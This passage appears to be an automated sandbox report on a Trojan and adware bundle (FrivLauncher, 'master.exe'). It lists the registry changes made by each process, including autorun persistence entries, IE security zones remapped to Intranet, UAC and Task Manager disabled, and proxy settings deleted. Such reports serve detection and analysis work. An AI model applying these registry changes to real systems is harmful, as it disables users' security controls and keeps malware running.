[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E E9 28 A8 56 46 5F 94 4C 7D 77 53 42 7F 27 AC"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 D1 27 E7 BC 72 B6 0F A7 59 87 F5 AE A3 83 4D"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D C9 31 3B 33 6B 23 CB 5E 5B BD 70 DF 4A B3 3B"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2160 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C3 3B 65 C7 8A 27 F9 36 85 C5 5C 10 52 26 22"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2148 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1D 07 5F D9 AC 10 EB 38 48 A6 47 4E 8D 28 81"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process runonce.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE A7 6E E3 6F 15 05 2D 46 B7 1B F2 62 FA 5F EC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"grpconv.exe" = "Windows Progman Group Converter"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes (names without dots) that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in the system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"
The process cvtres.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB BC 73 17 9B FC 38 20 B9 C5 7F EC 00 EB F2 DE"
The process cvtres.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 AD 4A A3 BC 16 4C A8 7D 79 1D D2 F0 C5 01 FB"
The process cvtres.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 72 98 CA C6 12 F5 02 D8 A6 F6 9D 5A 96 0B 1C"
The process cvtres.exe:952 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 FD 18 0D 51 E0 A0 35 12 A6 4F 24 C0 5D DF 7E"
The process cvtres.exe:1064 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 D2 D2 DC 4B 60 E6 26 1E 29 8E 35 32 67 69 1B"
The process cvtres.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0D 46 7A F5 1D BD 3B 99 0F 29 F5 E3 80 85 D8"
The process cvtres.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6B 75 2A 6B C1 0D 17 F2 2F B2 F5 85 7B 50 43"
The process cvtres.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D3 5E 87 47 30 4E 42 C5 1D A0 D1 DC 6A 45 B3"
The process cvtres.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 11 D1 C4 63 2E C0 4D DE 2C 7C 39 47 EC 15 5D"
The process Osman_Navigation.exe:4072 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayVersion" = "2.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"UninstallString" = "%Program Files%\FrivLauncher\uninst.exe"
[HKLM\SOFTWARE\Reltek]
"channel" = "egg7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 81 51 83 26 17 CC 23 93 E1 47 CA 29 DC AA 9D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayName" = "FrivLauncher 2.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\FrivLauncher.exe]
"(Default)" = "%Program Files%\FrivLauncher\FrivLauncher.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Reltek]
"LangID" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"Publisher" = "Friv Launcher"
"DisplayIcon" = "%Program Files%\FrivLauncher\FrivLauncher.exe"
To run itself automatically each time Windows boots, the Trojan adds the following entry pointing to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
The process PSSetupNativeUtils.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD B5 3C 3C 58 DB F4 A8 01 1B D6 81 E6 8A 15"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process mastermind.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\BrowserEmulation]
"DisableSiteListEditing" = "1"
[HKLM\SOFTWARE\master]
"InstalledTime" = "2016-5-12 0:18:21"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"WarnOnClose" = "0"
[HKCU\Software\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\master]
"InstalledVersion" = "1.00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0]
"(Default)" = "MiamiReportsLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400" = "0"
[HKLM\SOFTWARE\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1409" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1400" = "0"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"Enabled" = "1"
[HKCU\Software\master]
"Macaddress" = "00-0C-29-5C-94-64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1409" = "3"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Safety\PrivacIE]
"DisableToolbars" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2]
"1609" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableTaskMgr" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\master]
"Macaddress" = "00-0C-29-5C-94-64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master\masterReports.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 42 37 BA E3 A6 E0 E6 92 41 23 9F 4B 19 9F 90"
[HKCU\Software\master]
"InstalledTime" = "2016-5-12 0:18:21"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1409" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext]
"DisableAddonLoadTimePerformanceNotifications" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1400" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1409" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1609" = "0"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\CommandBar]
"ShowCompatibilityViewButton" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
User account control (UAC) is disabled:
"EnableLUA" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hwopt12052016001648.exe:912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 2F 7B 95 FF 71 EA 0B 36 72 C4 FF 25 79 5E 44"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\Service1]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[ADWARE_ROI]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
The process grpconv.exe:3484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 83 16 AA 74 E1 04 08 10 AA D3 69 69 82 F1 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\GrpConv]
"Log" = "Init Application."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\MSProgramGroup\Shell\Open\Command]
"(Default)" = "%System%\grpconv.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\MSProgramGroup]
